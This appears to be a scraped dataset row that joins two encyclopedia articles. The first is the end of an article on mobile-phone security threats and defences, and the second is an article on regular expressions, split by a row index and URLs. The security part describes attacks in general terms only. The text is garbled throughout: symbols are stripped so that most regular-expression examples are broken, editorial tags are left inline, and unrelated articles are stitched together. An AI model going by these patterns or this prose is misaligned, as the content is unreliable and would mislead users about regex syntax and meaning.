customers know what services the facility provides. Generally, individuals filter business premises based on Internet connections as another reason to gain a competitive edge. Network security is the responsibility of the organizations, as unsecured Wi-Fi networks are prone to numerous risks. The man-in-the-middle attack entails the interception and modification of data between parties. Additionally, malware can be distributed via the free Wi-Fi network and hackers can exploit software vulnerabilities to smuggle malware onto connected devices. It is also possible to eavesdrop and sniff Wi-Fi signals using special software and devices, capturing login credentials and hijacking accounts. 9 As with GSM, if the attacker succeeds in breaking the identification key, both the phone and the entire network it is connected to become exposed to attacks. Many smartphones remember wireless LANs they have previously connected to, allowing users to not have to re-identify with each connection. However, an attacker could create a Wi-Fi access point twin with the same parameters and characteristics as a real network. By automatically connecting to the fraudulent network, a smartphone becomes susceptible to the attacker, who can intercept any unencrypted data. 21 Lasco is a worm that initially infects a remote device using the SIS file format, 22 a type of script file that can be executed by the system without user interaction. The smartphone thus believes the file to come from a trusted source and downloads it, infecting the machine. 22 Security issues related to Bluetooth on mobile devices have been studied and have shown numerous problems on different phones. One easy to exploit vulnerability is that unregistered services do not require authentication, and vulnerable applications have a virtual serial port used to control the phone. An attacker only needed to connect to the port to take full control of the device. 23 In another example, an attacker sends a file via Bluetooth to a phone within range with Bluetooth in discovery mode. If the recipient accepts, a virus is transmitted. An example of this is a worm called Cabir. 16 The worm searches for nearby phones with Bluetooth in discoverable mode and sends itself to the target device. The user must accept the incoming file and install the program, after which the worm infects the machine. Other attacks are based on flaws in the OS or applications on the phone. The mobile web browser is an emerging attack vector for mobile devices. Just as common Web browsers, mobile web browsers are extended from pure web navigation with widgets and plug-ins or are completely native mobile browsers. Jailbreaking the iPhone with firmware 1.1.1 was based entirely on vulnerabilities on the web browser. 24 In this case, there was a vulnerability based on a stack-based buffer overflow in a library used by the web browser (LibTIFF). A similar vulnerability in the web browser for Android was discovered in October 2008. 25 Like the iPhone vulnerability, it was due to an obsolete and vulnerable library, but significantly differed in that Android's sandboxing architecture limited the effects of this vulnerability to the Web browser process. Smartphones are also victims of classic Web piracy such as phishing, malicious websites, and background-running software. The big difference is that smartphones do not yet have strong antivirus software available. 26 failed verification The Internet offers numerous interactive features that ensure a higher engagement rate, capture more and relevant data, and increase brand loyalty. Blogs, forums, social networks, and wikis are some of the most common interactive websites. Due to the tremendous growth of the Internet, there has been a rapid rise in the number of security breaches experienced by individuals and businesses. Mobile browser users can balance usage and caution in several ways, 27 such as reviewing computer security regularly, using secure and secret passwords, and correcting, upgrading, and replacing the necessary features. Installation of antivirus and anti-spyware programs is the most effective way of protecting the computer, as they offer protection against malware, spyware, and viruses. Additionally, they use firewalls, which are typically installed between trusted networks or devices and the Internet. By acting as a web server, the firewall prevents external users from accessing the internal computer system. 28 failed verification Sometimes it is possible to overcome the security safeguards by modifying the operating system (OS) itself, such as the manipulation of firmware and malicious signature certificates. These attacks are difficult. In 2004, vulnerabilities in virtual machines running on certain devices were revealed. It was possible to bypass the bytecode verifier and access the native underlying operating system. 3 The results of this research were not published in detail. The firmware security of Nokia's Symbian Platform Security Architecture (PSA) is based on a central configuration file called SWIPolicy. In 2008, it was possible to manipulate the Nokia firmware before it was installed. In fact, some downloadable versions of this file were human-readable, so it was possible to modify and change the image of the firmware. 29 This vulnerability was solved by an update from Nokia. In theory, smartphones have an advantage over hard drives since the OS files are in read-only memory (ROM) and cannot be changed by malware. However, in some systems it was possible to circumvent this: in the Symbian OS, it was possible to overwrite a file with a file of the same name. 29 On the Windows OS, it was possible to change a pointer from a general configuration file to an editable file. When an application is installed, the signing of this application is verified by a series of certificates. One can create a valid signature without using a valid certificate and add it to the list. 30 In the Symbian OS, all certificates are in the directory c: resource swicertstore dat. With firmware changes explained above, it is very easy to insert a seemingly valid but malicious certificate. Android is the OS that has been attacked the most, because it has the largest userbase. A cybersecurity company which? reported to have blocked about 18 million attacks in 2016. 31 In 2015, researchers at the French government agency Agence nationale de la s curit des syst mes d'information (ANSSI, lit. 'French National Agency for the Security of Information Systems') demonstrated the capability to trigger the voice interface of certain smartphones remotely by using "specific electromagnetic waveforms". 4 The exploit took advantage of antenna-properties of headphone wires while plugged into the audio-output jacks of the vulnerable smartphones and effectively spoofed audio input to inject commands via the audio interface. 4 Juice jacking is a physical or hardware vulnerability specific to mobile platforms. Utilizing the dual purpose of the USB charge port, many devices have been susceptible to having data exfiltrated from, or malware installed onto, a mobile device by utilizing malicious charging kiosks set up in public places or hidden in normal charge adapters. Jailbreaking is also a physical access vulnerability, in which a mobile device user hacks into device to unlock it, exploiting weaknesses in the operating system. Mobile device users take control of their own device by jailbreaking it, allowing them to customize the interface by installing applications, change system settings that are not allowed on the devices, tweak OS processes, and run uncertified programs. This openness exposes the device to a variety of malicious attacks which can compromise private data. 5 In 2010, researchers from the University of Pennsylvania investigated the possibility of cracking a device's password through a smudge attack (literally imaging the finger smudges on the screen to discern the user's password). 27 The researchers were able to discern the device password up to 68% of the time under certain conditions. 27 Outsiders may perform over-the-shoulder surveillance on victims, such as watching specific keystrokes or pattern gestures, to unlock device password or passcode. As smartphones are a permanent point of access to the Internet (they are often turned on), they can be compromised with malware as easily as computers. A malware is a computer program that aims to harm the system in which it resides. Trojans, worms and viruses are all considered malware. A Trojan is a program on a device that allows external users to connect discreetly. A worm is a program that reproduces on multiple computers across a network. A virus is a malicious software designed to spread to other computers by inserting itself into legitimate programs and running programs in parallel. Malware is far less numerous and serious to smartphones as it is to computers. Nonetheless, recent studies show that the evolution of malware in smartphones have rocketed in the last few years posing a threat to analysis and detection. 25 In 2017, mobile malware variants increased by 54%. 33 Various common apps installed by millions can intrude on privacy, even if they were installed from a trusted software distribution service like the Google Play Store. For example, in 2022 it was shown that the popular app TikTok collects a lot of data and is required to make it available to the Chinese Communist Party (CCP) due to a national security law. This includes personal information on millions of Americans. The firmware and "stock software" preinstalled on devices and updated with preinstalled software can also have undesired components or privacy-intruding default configurations or substantial security vulnerabilities. In 2019, Kryptowire identified Android devices with malicious firmware that collected and transmitted sensitive data without users' consent. Analysis of data traffic by popular smartphones running variants of Android found substantial by-default data collection and sharing with no opt-out by pre-installed software. 34 35 This issue also can't be addressed by conventional security patches. Outgoing Internet traffic can be analyzed with packet analyzers and with firewall apps like the NetGuard firewall app for Android that allows reading blocked traffic logs. 36 additional citation(s) needed Typically, an attack on a smartphone made by malware takes place in three phases: the infection of a host, the accomplishment of its goal, and the spread of the malware to other systems. Malware often uses the resources offered by infected smartphones. It will use the output devices such as Bluetooth or infrared, but it may also use the address book or email address of the person to infect the user's acquaintances. The malware exploits the trust that is given to data sent by an acquaintance. Infection is the method used by malware to gain access to the smartphone; it may exploit an internal vulnerability or rely on the gullibility of the user. Infections are classified into four classes according to their degree of user interaction: 37 Accomplishment of its goal Once the malware has infected a phone, it will also seek to accomplish its goal, which is usually one of the following: 38 Once the malware has infected a smartphone, it aims to spread to a new host. 39 This usually occurs to proximate devices via Wi-Fi, Bluetooth, or infrared; or to remote networks via telephone calls, SMS, or emails. Mobile ransomware is a type of malware that locks users out of their mobile devices in a pay-to-unlock-your-device ploy. It has significantly grown as a threat category since 2014. 42 Mobile users are often less security-conscious particularly as it pertains to scrutinizing applications and web links and trust the mobile device's native protection capability. Mobile ransomware poses a significant threat to businesses reliant on instant access and availability of their proprietary information and contacts. The likelihood of a traveling businessman paying a ransom to unlock their device is significantly higher since they are at a disadvantage given inconveniences such as timeliness and less direct access to IT staff. Recent ransomware attacks have caused many Internet-connected devices to not work and are costly for companies to recover from. Attackers can make their malware target multiple platforms. Some malware attacks operating systems but is able to spread across different systems. To begin with, malware can use runtime environments like Java virtual machine or the .NET Framework. They can also use other libraries present in many operating systems. 44 Some malware carries several executable files in order to run in multiple environments, utilizing these during the propagation process. In practice, this type of malware requires a connection between the two operating systems to use as an attack vector. Memory cards can be used for this purpose, or synchronization software can be used to propagate the virus. Mobile security is divided into different categories, as methods do not all act at the same level and are designed to prevent different threats. These methods range from the management of security by the operating system (protecting the system from corruption by an application) to the behavioral education of the user (preventing the installation of a suspicious software). The first layer of security in a smartphone is the operating system. Beyond needing to handle the usual roles (e.g., resource management, scheduling processes) on the device, it must also establish the protocols for introducing external applications and data without introducing risk. citation needed A central paradigm in mobile operating systems is the idea of a sandbox. Since smartphones are currently designed to accommodate many applications, they must have mechanisms to ensure these applications are safe for the phone itself, for other applications and data on the system, and for the user. If a malicious program reaches a mobile device, the vulnerable area presented by the system must be as small as possible. Sandboxing extends this idea to compartmentalize different processes, preventing them from interacting and damaging each other. Based on the history of operating systems, sandboxing has different implementations. For example, where iOS will focus on limiting access to its public API for applications from the App Store by default, Managed Open In allows you to restrict which apps can access which types of data. Android bases its sandboxing on its legacy of Linux and TrustedBSD. The following points highlight mechanisms implemented in operating systems, especially Android. Above the operating system security, there is a layer of security software. This layer is composed of individual components to strengthen various vulnerabilities: prevent malware, intrusions, the identification of a user as a human, and user authentication. It contains software components that have learned from their experience with computer security; however, on smartphones, this software must deal with greater constraints (see limitations). Should a malicious application pass the security barriers, it can take the actions for which it was designed. However, this activity can be sometimes detected by monitoring the various resources used on the phone. Depending on the goals of the malware, the consequences of infection are not always the same; all malicious applications are not intended to harm the devices on which they are deployed. 61 The following resources are only indications and do not provide certainty about the legitimacy of the activity of an application. However, these criteria can help target suspicious applications, especially if several criteria are combined. Network traffic exchanged by phones can be monitored. One can place safeguards in network routing points in order to detect abnormal behavior. As the mobile's use of network protocols is much more constrained than that of a computer, expected network data streams can be predicted (e.g., the protocol for sending an SMS), which permits detection of anomalies in mobile networks. 63 In the production and distribution chain for mobile devices, manufacturers are responsibility for ensuring that devices are delivered in a basic configuration without vulnerabilities. Most users are not experts and many of them are not aware of the existence of security vulnerabilities, so the device configuration as provided by manufacturers will be retained by many users. Some smartphone manufacturers add Titan M2s (a security hardware chip) to increase mobile security. 64 65 The user has a large responsibility in the cycle of security. This can be as simple as using a password, or as detailed as precisely controlling which permissions are granted to applications. This precaution is especially important if the user is an employee of a company who stores business data on the device. Much malicious behavior is allowed by user carelessness. Smartphone users were found to ignore security messages during application installation, especially during application selection and checking application reputation, reviews, security, and agreement messages. 72 A recent survey by internet security experts BullGuard showed a lack of insight concerning the rising number of malicious threats affecting mobile phones, with 53% of users claiming that they are unaware of security software for smartphones. A further 21% argued that such protection was unnecessary, and 42% admitted it hadn't crossed their mind ("Using APA, 2011). full citation needed These statistics show that consumers are not concerned about security risks because they believe it is not a serious problem. However, in truth, smartphones are effectively handheld computers and are just as vulnerable. The following are precautions that a user can take to manage security on a smartphone: These precautions reduce the ability for people or malicious applications to exploit a user's smartphone. If users are careful, many attacks can be defeated, especially phishing and applications seeking only to obtain rights on a device. One form of mobile protection allows companies to control the delivery and storage of text messages, by hosting the messages on a company server, rather than on the sender or receiver's phone. When certain conditions are met, such as an expiration date, the messages are deleted. 79 The security mechanisms mentioned in this article are to a large extent inherited from knowledge and experience with computer security. The elements composing the two device types are similar, and there are common measures that can be used, such as antivirus software and firewalls. However, the implementation of these solutions is not necessarily possible (or is at least highly constrained) within a mobile device. The reason for this difference is the technical resources available to computers and mobile devices: even though the computing power of smartphones is becoming faster, they have other limitations: Furthermore, it is common that even if updates exist, or can be developed, they are not always deployed. For example, a user may not be aware of operating system updates; or a user may discover known vulnerabilities that are not corrected until the end of a long development cycle, which allows time to exploit the loopholes. 67 The following mobile environments are expected to make up future security frameworks: |
566 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Regular_expression | A regular expression (shortened as regex or regexp), 1 sometimes referred to as rational expression, 2 3 is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for "find" or "find and replace" operations on strings, or for input validation. Regular expression techniques are developed in theoretical computer science and formal language theory. The concept of regular expressions began in the 1950s, when the American mathematician Stephen Cole Kleene formalized the concept of a regular language. They came into common use with Unix text-processing utilities. Different syntaxes for writing regular expressions have existed since the 1980s, one being the POSIX standard and another, widely used, being the Perl syntax. Regular expressions are used in search engines, in search and replace dialogs of word processors and text editors, in text processing utilities such as sed and AWK, and in lexical analysis. Regular expressions are supported in many programming languages. Library implementations are often called an "engine", 4 5 and many of these are available for reuse. Regular expressions originated in 1951, when mathematician Stephen Cole Kleene described regular languages using his mathematical notation called regular events. 6 7 These arose in theoretical computer science, in the subfields of automata theory (models of computation) and the description and classification of formal languages, motivated by Kleene's attempt to describe early artificial neural networks. (Kleene introduced it as an alternative to McCulloch Pitts's "prehensible", but admitted "We would welcome any suggestions as to a more descriptive term. 8 ) Other early implementations of pattern matching include the SNOBOL language, which did not use regular expressions, but instead its own pattern matching constructs. Regular expressions entered popular use from 1968 in two uses: pattern matching in a text editor 9 and lexical analysis in a compiler. 10 Among the first appearances of regular expressions in program form was when Ken Thompson built Kleene's notation into the editor QED as a means to match patterns in text files. 9 11 12 13 For speed, Thompson implemented regular expression matching by just-in-time compilation (JIT) to IBM 7094 code on the Compatible Time-Sharing System, an important early example of JIT compilation. 14 He later added this capability to the Unix editor ed, which eventually led to the popular search tool grep's use of regular expressions ("grep" is a word derived from the command for regular expression searching in the ed editor: g re p meaning "Global search for Regular Expression and Print matching lines"). 15 Around the same time when Thompson developed QED, a group of researchers including Douglas T. Ross implemented a tool based on regular expressions that is used for lexical analysis in compiler design. 10 Many variations of these original forms of regular expressions were used in Unix 13 programs at Bell Labs in the 1970s, including lex, sed, AWK, and expr, and in other programs such as vi, and Emacs (which has its own, incompatible syntax and behavior). Regexes were subsequently adopted by a wide range of programs, with these early forms standardized in the POSIX.2 standard in 1992. In the 1980s, the more complicated regexes arose in Perl, which originally derived from a regex library written by Henry Spencer (1986), who later wrote an implementation for Tcl called Advanced Regular Expressions. 16 The Tcl library is a hybrid NFA DFA implementation with improved performance characteristics. Software projects that have adopted Spencer's Tcl regular expression implementation include PostgreSQL. 17 Perl later expanded on Spencer's original library to add many new features. 18 Part of the effort in the design of Raku (formerly named Perl 6) is to improve Perl's regex integration, and to increase their scope and capabilities to allow the definition of parsing expression grammars. 19 The result is a mini-language called Raku rules, which are used to define Raku grammar as well as provide a tool to programmers in the language. These rules maintain existing features of Perl 5.x regexes, but also allow BNF-style definition of a recursive descent parser via sub-rules. The use of regexes in structured information standards for document and database modeling started in the 1960s and expanded in the 1980s when industry standards like ISO SGML (precursored by ANSI "GCA 101 1983") consolidated. The kernel of the structure specification language standards consists of regexes. Its use is evident in the DTD element group syntax. Prior to the use of regular expressions, many search languages allowed simple wildcards, for example to match any sequence of characters, and ? to match a single character. Relics of this can be found today in the glob syntax for filenames, and in the SQL LIKE operator. Starting in 1997, Philip Hazel developed PCRE (Perl Compatible Regular Expressions), which attempts to closely mimic Perl's regex functionality and is used by many modern tools including PHP and Apache HTTP Server. 20 Today, regexes are widely supported in programming languages, text processing programs (particularly lexers), advanced text editors, and some other programs. Regex support is part of the standard library of many programming languages, including Java and Python, and is built into the syntax of others, including Perl and ECMAScript. In the late 2010s, several companies started to offer hardware, FPGA, 21 GPU 22 implementations of PCRE compatible regex engines that are faster compared to CPU implementations. The phrase regular expressions, or regexes, is often used to mean the specific, standard textual syntax for representing patterns for matching text, as distinct from the mathematical notation described below. Each character in a regular expression (that is, each character in the string describing its pattern) is either a metacharacter, having a special meaning, or a regular character that has a literal meaning. For example, in the regex b., 'b' is a literal character that matches just 'b', while . is a metacharacter that matches every character except a newline. Therefore, this regex matches, for example, 'b , or 'bx', or 'b5'. Together, metacharacters and literal characters can be used to identify text of a given pattern or process a number of instances of it. Pattern matches may vary from a precise equality to a very general similarity, as controlled by the metacharacters. For example, . is a very general pattern, a-z (match all lower case letters from 'a' to 'z') is less general and b is a precise pattern (matches just 'b'). The metacharacter syntax is designed specifically to represent prescribed targets in a concise and flexible way to direct the automation of text processing of a variety of input data, in a form easy to type using a standard ASCII keyboard. A very simple case of a regular expression in this syntax is to locate a word spelled two different ways in a text editor, the regular expression seriali sz e matches both "serialise" and "serialize". Wildcard characters also achieve this, but are more limited in what they can pattern, as they have fewer metacharacters and a simple language-base. The usual context of wildcard characters is in globbing similar names in a list of files, whereas regexes are usually employed in applications that pattern-match text strings in general. For example, the regex t t matches excess whitespace at the beginning or end of a line. An advanced regular expression that matches any numeral is ?( d ( . d )? . d )( eE ? d )?. A regex processor translates a regular expression in the above syntax into an internal representation that can be executed and matched against a string representing the text being searched in. One possible approach is the Thompson's construction algorithm to construct a nondeterministic finite automaton (NFA), which is then made deterministic and the resulting deterministic finite automaton (DFA) is run on the target text string to recognize substrings that match the regular expression. The picture shows the NFA scheme N(s ) obtained from the regular expression s , where s denotes a simpler regular expression in turn, which has already been recursively translated to the NFA N(s). A regular expression, often called a pattern, specifies a set of strings required for a particular purpose. A simple way to specify a finite set of strings is to list its elements or members. However, there are often more concise ways: for example, the set containing the three strings "Handel", "H ndel", and "Haendel" can be specified by the pattern H( ae?)ndel; we say that this pattern matches each of the three strings. However, there can be many ways to write a regular expression for the same set of strings: for example, (H n Han Haen)del also specifies the same set of three strings in this example. Most formalisms provide the following operations to construct regular expressions. These constructions can be combined to form arbitrarily complex expressions, much like one can construct arithmetical expressions from numbers and the operations , , , and . The precise syntax for regular expressions varies among tools and with context; more detail is given in Syntax. Regular expressions describe regular languages in formal language theory. They have the same expressive power as regular grammars. Regular expressions consist of constants, which denote sets of strings, and operator symbols, which denote operations over these sets. The following definition is standard, and found as such in most textbooks on formal language theory. 24 25 Given a finite alphabet , the following constants are defined as regular expressions: Given regular expressions R and S, the following operations over them are defined to produce regular expressions: To avoid parentheses, it is assumed that the Kleene star has the highest priority followed by concatenation, then alternation. If there is no ambiguity, then parentheses may be omitted. For example, (ab)c can be written as abc, and a (b(c )) can be written as a bc . Many textbooks use the symbols , , or for alternation instead of the vertical bar. Examples: The formal definition of regular expressions is minimal on purpose, and avoids defining ? and —these can be expressed as follows: a aa , and a? (a ). Sometimes the complement operator is added, to give a generalized regular expression; here Rc matches all strings over that do not match R. In principle, the complement operator is redundant, because it does not grant any more expressive power. However, it can make a regular expression much more concise—eliminating a single complement operator can cause a double exponential blow-up of its length. 26 27 28 Regular expressions in this sense can express the regular languages, exactly the class of languages accepted by deterministic finite automata. There is, however, a significant difference in compactness. Some classes of regular languages can only be described by deterministic finite automata whose size grows exponentially in the size of the shortest equivalent regular expressions. The standard example here is the languages Lk consisting of all strings over the alphabet a,b whose kth-from-last letter equals a. On the one hand, a regular expression describing L4 is given by ( a b ) a ( a b ) ( a b ) ( a b ) displaystyle (a mid b) a(a mid b)(a mid b)(a mid b) . Generalizing this pattern to Lk gives the expression: On the other hand, it is known that every deterministic finite automaton accepting the language Lk must have at least 2k states. Luckily, there is a simple mapping from regular expressions to the more general nondeterministic finite automata (NFAs) that does not lead to such a blowup in size; for this reason NFAs are often used as alternative representations of regular languages. NFAs are a simple variation of the type 3 grammars of the Chomsky hierarchy. 24 In the opposite direction, there are many languages easily described by a DFA that are not easily described by a regular expression. For instance, determining the validity of a given ISBN requires computing the modulus of the integer base 11, and can be easily implemented with an 11 state DFA. However, converting it to a regular expression results in a 2,14 megabytes file . 29 Given a regular expression, Thompson's construction algorithm computes an equivalent nondeterministic finite automaton. A conversion in the opposite direction is achieved by Kleene's algorithm. Finally, it is worth noting that many real-world "regular expression" engines implement features that cannot be described by the regular expressions in the sense of formal language theory; rather, they implement regexes. See below for more on this. As seen in many of the examples above, there is more than one way to construct a regular expression to achieve the same results. It is possible to write an algorithm that, for two given regular expressions, decides whether the described languages are equal; the algorithm reduces each expression to a minimal deterministic finite state machine, and determines whether they are isomorphic (equivalent). Algebraic laws for regular expressions can be obtained using a method by Gischer which is best explained along an example: In order to check whether (X Y) and (X Y ) denote the same regular language, for all regular expressions X, Y, it is necessary and sufficient to check whether the particular regular expressions (a b) and (a b ) denote the same language over the alphabet a,b . More generally, an equation E F between regular-expression terms with variables holds if, and only if, its instantiation with different variables replaced by different symbol constants holds. 30 31 Every regular expression can be written solely in terms of the Kleene star and set unions over finite words. This is a surprisingly difficult problem. As simple as the regular expressions are, there is no method to systematically rewrite them to some normal form. The lack of axiom in the past led to the star height problem. In 1991, Dexter Kozen axiomatized regular expressions as a Kleene algebra, using equational and Horn clause axioms. 32 Already in 1964, Redko had proved that no finite set of purely equational axioms can characterize the algebra of regular languages. 33 A regex pattern matches a target string. The pattern is composed of a sequence of atoms. An atom is a single point within the regex pattern which it tries to match to the target string. The simplest atom is a literal, but grouping parts of the pattern to match an atom will require using ( ) as metacharacters. Metacharacters help form: atoms; quantifiers telling how many atoms (and whether it is a greedy quantifier or not); a logical OR character, which offers a set of alternatives, and a logical NOT character, which negates an atom's existence; and backreferences to refer to previous atoms of a completing pattern of atoms. A match is made, not when all the atoms of the string are matched, but rather when all the pattern atoms in the regex have matched. The idea is to make a small pattern of characters stand for a large number of possible strings, rather than compiling a large list of all the literal possibilities. Depending on the regex processor there are about fourteen metacharacters, characters that may or may not have their literal character meaning, depending on context, or whether they are "escaped", i.e. preceded by an escape sequence, in this case, the backslash . Modern and POSIX extended regexes use metacharacters more often than their literal meaning, so to avoid "backslash-osis" or leaning toothpick syndrome, they have a metacharacter escape to a literal mode; starting out, however, they instead have the four bracketing metacharacters ( ) and be primarily literal, and "escape" this usual meaning to become metacharacters. Common standards implement both. The usual metacharacters are () . ? and . The usual characters that become metacharacters when escaped are dswDSW and N. When entering a regex in a programming language, they may be represented as a usual string literal, hence usually quoted; this is common in C, Java, and Python for instance, where the regex re is entered as "re". However, they are often written with slashes as delimiters, as in re for the regex re. This originates in ed, where is the editor command for searching, and an expression re can be used to specify a range of lines (matching the pattern), which can be combined with other commands on either side, most famously g re p as in grep ("global regex print"), which is included in most Unix-based operating systems, such as Linux distributions. A similar convention is used in sed, where search and replace is given by s re replacement and patterns can be joined with a comma to specify a range of lines as in re1 , re2 . This notation is particularly well known due to its use in Perl, where it forms part of the syntax distinct from normal string literals. In some cases, such as sed and Perl, alternative delimiters can be used to avoid collision with contents, and to avoid having to escape occurrences of the delimiter character in the contents. For example, in sed the command s, ,X, will replace a with an X, using commas as delimiters. The IEEE POSIX standard has three sets of compliance: BRE (Basic Regular Expressions), 34 ERE (Extended Regular Expressions), and SRE (Simple Regular Expressions). SRE is deprecated, 35 in favor of BRE, as both provide backward compatibility. The subsection below covering the character classes applies to both BRE and ERE. BRE and ERE work together. ERE adds ?, , and , and it removes the need to escape the metacharacters ( ) and , which are required in BRE. Furthermore, as long as the POSIX standard syntax for regexes is adhered to, there can be, and often is, additional syntax to serve specific (yet POSIX compliant) applications. Although POSIX.2 leaves some implementation specifics undefined, BRE and ERE provide a "standard" which has since been adopted as the default syntax of many tools, where the choice of BRE or ERE modes is usually a supported option. For example, GNU grep has the following options: "grep -E" for ERE, and "grep -G" for BRE (the default), and "grep -P" for Perl regexes. Perl regexes have become a de facto standard, having a rich and powerful set of atomic expressions. Perl has no "basic" or "extended" levels. As in POSIX EREs, ( ) and are treated as metacharacters unless escaped; other metacharacters are known to be literal or symbolic based on context alone. Additional functionality includes lazy matching, backreferences, named capture groups, and recursive patterns. In the POSIX standard, Basic Regular Syntax (BRE) requires that the metacharacters ( ) and be designated ( ) and , whereas Extended Regular Syntax (ERE) does not. The - character is treated as a literal character if it is the last or the first (after the , if present) character within the brackets: abc , abc , abc . Backslash escapes are not allowed. The character can be included in a bracket expression if it is the first (after the , if present) character: abc , abc . Examples: According to Ross Cox, the POSIX specification requires ambiguous subexpressions to be handled in a way different from Perl's. The committee replaced Perl's rules with one that is simple to explain, but the new "simple" rules are actually more complex to implement: they were incompatible with pre-existing tooling and made it essentially impossible to define a "lazy match" (see below) extension. As a result, very few programs actually implement the POSIX subexpression rules (even when they implement other parts of the POSIX syntax). 37 The meaning of metacharacters escaped with a backslash is reversed for some characters in the POSIX Extended Regular Expression (ERE) syntax. With this syntax, a backslash causes the metacharacter to be treated as a literal character. So, for example, ( ) is now ( ) and is now . Additionally, support is removed for n backreferences and the following metacharacters are added: Examples: POSIX Extended Regular Expressions can often be used with modern Unix utilities by including the command line flag -E. The character class is the most basic regex concept after a literal match. It makes one small sequence of characters match a larger set of characters. For example, A-Z could stand for any uppercase letter in the English alphabet, and d could mean any digit. Character classes apply to both POSIX levels. When specifying a range of characters, such as a-Z (i.e. lowercase a to uppercase Z), the computer's locale settings determine the contents by the numeric ordering of the character encoding. They could store digits in that sequence, or the ordering could be abc...zABC...Z, or aAbBcC...zZ. So the POSIX standard defines a character class, which will be known by the regex processor installed. Those definitions are in the following table: POSIX character classes can only be used within bracket expressions. For example, :upper: ab matches the uppercase letters and lowercase "a" and "b". An additional non-POSIX class understood by some tools is :word: , which is usually defined as :alnum: plus underscore. This reflects the fact that in many programming languages these are the characters that may be used in identifiers. The editor Vim further distinguishes word and word-head classes (using the notation w and h) since in many programming languages the characters that can begin an identifier are not the same as those that can occur in other positions: numbers are generally excluded, so an identifier would look like h w or :alpha: :alnum: in POSIX notation. Note that what the POSIX regex standards call character classes are commonly referred to as POSIX character classes in other regex flavors which support them. With most other regex flavors, the term character class is used to describe what POSIX calls bracket expressions. Because of its expressive power and (relative) ease of reading, many other utilities and programming languages have adopted syntax similar to Perl's—for example, Java, JavaScript, Julia, Python, Ruby, Qt, Microsoft's .NET Framework, and XML Schema. Some languages and tools such as Boost and PHP support multiple regex flavors. Perl-derivative regex implementations are not identical and usually implement a subset of features found in Perl 5.0, released in 1994. Perl sometimes does incorporate features initially found in other languages. For example, Perl 5.10 implements syntactic extensions originally developed in PCRE and Python. 38 In Python and some other implementations (e.g. Java), the three common quantifiers ( , and ?) are greedy by default because they match as many characters as possible. 39 The regex . (including the double-quotes) applied to the string matches the entire line (because the entire line begins and ends with a double-quote) instead of matching only the first part, "Ganymede, . The aforementioned quantifiers may, however, be made lazy or minimal or reluctant, matching as few characters as possible, by appending a question mark: . ? matches only "Ganymede, . 39 In Java and Python 3.11 , 40 quantifiers may be made possessive by appending a plus sign, which disables backing off (in a backtracking engine), even if doing so would allow the overall match to succeed: 41 While the regex . applied to the string matches the entire line, the regex . does not match at all, because . consumes the entire input, including the final . Thus, possessive quantifiers are most useful with negated character classes, e.g. , which matches "Ganymede, when applied to the same string. Another common extension serving the same function is atomic grouping, which disables backtracking for a parenthesized group. The typical syntax is (? group). For example, while (wi w)i matches both wi and wii, (? wi w)i only matches wii because the engine is forbidden from backtracking and so cannot try setting the group to "w" after matching "wi". 42 Possessive quantifiers are easier to implement than greedy and lazy quantifiers, and are typically more efficient at runtime. 41 IETF RFC 9485 describes "I-Regexp: An Interoperable Regular Expression Format". It specifies a limited subset of regular-expression idioms designed to be interoperable, i.e. produce the same effect, in a large number of regular-expression libraries. I-Regexp is also limited to matching, i.e. providing a true or false match between a regular expression and a given piece of text. Thus, it lacks advanced features such as capture groups, lookahead, and backreferences. 43 Many features found in virtually all modern regular expression libraries provide an expressive power that exceeds the regular languages. For example, many implementations allow grouping subexpressions with parentheses and recalling the value they match in the same expression (backreferences). This means that, among other things, a pattern can match strings of repeated words like "papa" or "WikiWiki", called squares in formal language theory. The pattern for these strings is (. ) 1. The language of squares is not regular, nor is it context-free, due to the pumping lemma. However, pattern matching with an unbounded number of backreferences, as supported by numerous modern tools, is still context sensitive. 44 The general problem of matching any number of backreferences is NP-complete, and the execution time for known algorithms grows exponentially by the number of backreference groups used. 45 However, many tools, libraries, and engines that provide such constructions still use the term regular expression for their patterns. This has led to a nomenclature where the term regular expression has different meanings in formal language theory and pattern matching. For this reason, some people have taken to using the term regex, regexp, or simply pattern to describe the latter. Larry Wall, author of the Perl programming language, writes in an essay about the design of Raku: "Regular expressions" … are only marginally related to real regular expressions. Nevertheless, the term has grown with the capabilities of our pattern matching engines, so I'm not going to try to fight linguistic necessity here. I will, however, generally call them "regexes" (or "regexen", when I'm in an Anglo-Saxon mood). 19 Other features not found in describing regular languages include assertions. These include the ubiquitous and , used since at least 1970, 46 as well as some more sophisticated extensions like lookaround that appeared in 1994. 47 Lookarounds define the surrounding of a match and do not spill into the match itself, a feature only relevant for the use case of string searching citation needed . Some of them can be simulated in a regular language by treating the surroundings as a part of the language as well. 48 The look-ahead assertions (? ...) and (? ...) have been attested since at least 1994, starting with Perl 5. 47 The look-behind assertions (? ...) and (? ...) are attested since 1997 in a commit by Ilya Zakharevich to Perl 5.005. 49 There are at least three different algorithms that decide whether and how a given regex matches a string. The oldest and fastest relies on a result in formal language theory that allows every nondeterministic finite automaton (NFA) to be transformed into a deterministic finite automaton (DFA). The DFA can be constructed explicitly and then run on the resulting input string one symbol at a time. Constructing the DFA for a regular expression of size m has the time and memory cost of O(2m), but it can be run on a string of size n in time O(n). Note that the size of the expression is the size after abbreviations, such as numeric quantifiers, have been expanded. An alternative approach is to simulate the NFA directly, essentially building each DFA state on demand and then discarding it at the next step. This keeps the DFA implicit and avoids the exponential construction cost, but running cost rises to O(mn). The explicit approach is called the DFA algorithm and the implicit approach the NFA algorithm. Adding caching to the NFA algorithm is often called the "lazy DFA" algorithm, or just the DFA algorithm without making a distinction. These algorithms are fast, but using them for recalling grouped subexpressions, lazy quantification, and similar features is tricky. 50 51 Modern implementations include the re1 re2 sregex family based on Cox's code. The third algorithm is to match the pattern against the input string by backtracking. This algorithm is commonly called NFA, but this terminology can be confusing. Its running time can be exponential, which simple implementations exhibit when matching against expressions like (a aa) b that contain both alternation and unbounded quantification and force the algorithm to consider an exponentially increasing number of sub-cases. This behavior can cause a security problem called Regular expression Denial of Service (ReDoS). Although backtracking implementations only give an exponential guarantee in the worst case, they provide much greater flexibility and expressive power. For example, any implementation which allows the use of backreferences, or implements the various extensions introduced by Perl, must include some kind of backtracking. Some implementations try to provide the best of both algorithms by first running a fast DFA algorithm, and revert to a potentially slower backtracking algorithm only when a backreference is encountered during the match. GNU grep (and the underlying gnulib DFA) uses such a strategy. 52 Sublinear runtime algorithms have been achieved using Boyer-Moore (BM) based algorithms and related DFA optimization 